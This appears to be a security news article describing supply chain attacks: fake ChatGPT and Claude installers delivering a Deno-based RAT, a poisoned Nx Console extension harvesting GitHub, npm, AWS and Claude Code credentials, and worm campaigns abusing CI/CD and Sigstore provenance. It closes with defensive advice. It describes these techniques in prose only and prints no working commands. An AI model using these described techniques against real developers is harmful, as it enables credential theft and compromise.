Supply chain malware now rides on fake AI tools and trusted extensions
Supply chain malware delivered through fake AI installers and poisoned developer extensions is a growing attack pattern where criminals compromise the tools developers trust most, then silently propagate backdoors, credential stealers, and remote access trojans through ordinary updates and downloads. Instead of attacking production servers directly, threat actors now focus on GitHub repositories, CI/CD pipelines, and popular plugins, turning trusted distribution channels into delivery systems for credential theft and wallet draining. The same pattern appears across counterfeit installers posing as ChatGPT or Claude and compromised extensions like Nx Console in Visual Studio Code. In each case, attackers bet that busy developers will accept familiar names, logos, and auto-updates as proof of safety. As these incidents spread across open-source ecosystems and developer platforms, organizations must treat every tool in the build chain as a potential attack surface, not a default safe zone.
Fake ChatGPT and Claude installers delivering Deno RAT malware
Threat actors are seeding GitHub and SourceForge with fake AI installers and plugins that pretend to be ChatGPT, Claude, and popular audio tools, but instead deliver DinDoor and a Deno-based RAT. Compromised YouTube channels with AI-generated videos funnel viewers to these repositories, and the lures have already earned more than 50,000 views. Victims are told to paste terminal commands that install Scoop and WinGet, then the Deno runtime, which is used to pull DinDoor from a remote server and execute the next stage only in memory. The resulting Deno RAT, previously tracked as Smokest, can execute arbitrary commands, run PowerShell, manage files and processes, open SOCKS5 proxies, and steal more than 50 cryptocurrency wallets along with browser-stored credentials. This is a textbook example of fake AI installers turning developer curiosity about new tools into full endpoint compromise.
From Nx Console to GitHub: a poisoned extension and a platform breach
The GitHub security breach showed how a single poisoned VS Code extension can undermine even a global development platform. Attackers compromised Nx developer systems and pushed a malicious Nx Console release (v18.95.0) that was briefly live on the Visual Studio Marketplace for about 18 minutes yet still reached developers through automatic updates. That version harvested tokens from GitHub, npm, AWS, HashiCorp Vault, Kubernetes, and 1Password, and it even searched for Claude Code configuration files under ~/.claude/settings.json. According to CISA, this led to unauthorized access and exfiltration of internal GitHub repositories after a single employee installed the tainted build. The incident underlines that AutoUpdate plus brand recognition is no longer enough; developers now have to assume that even widely installed extensions with strong reputations can become supply chain malware delivery vehicles.
Developer tools compromise at scale: Nx Console, Megalodon, and Mini Shai-Hulud
The Nx Console incident is part of a much wider wave of developer tools compromise. CISA highlights the Megalodon campaign, where attackers injected malicious GitHub Actions workflows to harvest CI/CD secrets, cloud credentials, and tokens across public repositories. At the same time, the financially motivated group TeamPCP has been running automated supply chain attacks with its Mini Shai-Hulud worm, which steals CI/CD credentials and republishes infected packages. One documented wave swapped in 639 malicious npm package versions across 323 packages in the @antv ecosystem. Security researchers note that the worm even calls Fulcio and Rekor at runtime to obtain valid Sigstore certificates, so malicious packages still show green provenance badges. These campaigns prove that development infrastructure—extensions, workflows, and registries—is now a primary target, not collateral damage.
Defending against fake AI installers and supply chain malware
Defending against fake AI installers and broader supply chain malware requires verification beyond logos and familiar names. Developers should only download AI tools and extensions from official publisher URLs, pinned GitHub organizations, or marketplace listings confirmed through vendor documentation. Every installer and archive should be checked against published checksums or cryptographic signatures, and any repository that asks users to paste opaque terminal one-liners should be treated with suspicion. Organizations should monitor GitHub Actions, workflow files, and automated accounts such as build-bot or ci-bot for unexplained changes, and roll back unauthorized commits. Where possible, restrict tokens and CI/CD secrets to least privilege and store them in dedicated secret managers rather than config files on developer machines. By treating fake AI installers and extensions as high-risk inputs to the build chain, teams can reduce the chance that a single deceptive download becomes a full developer tools compromise.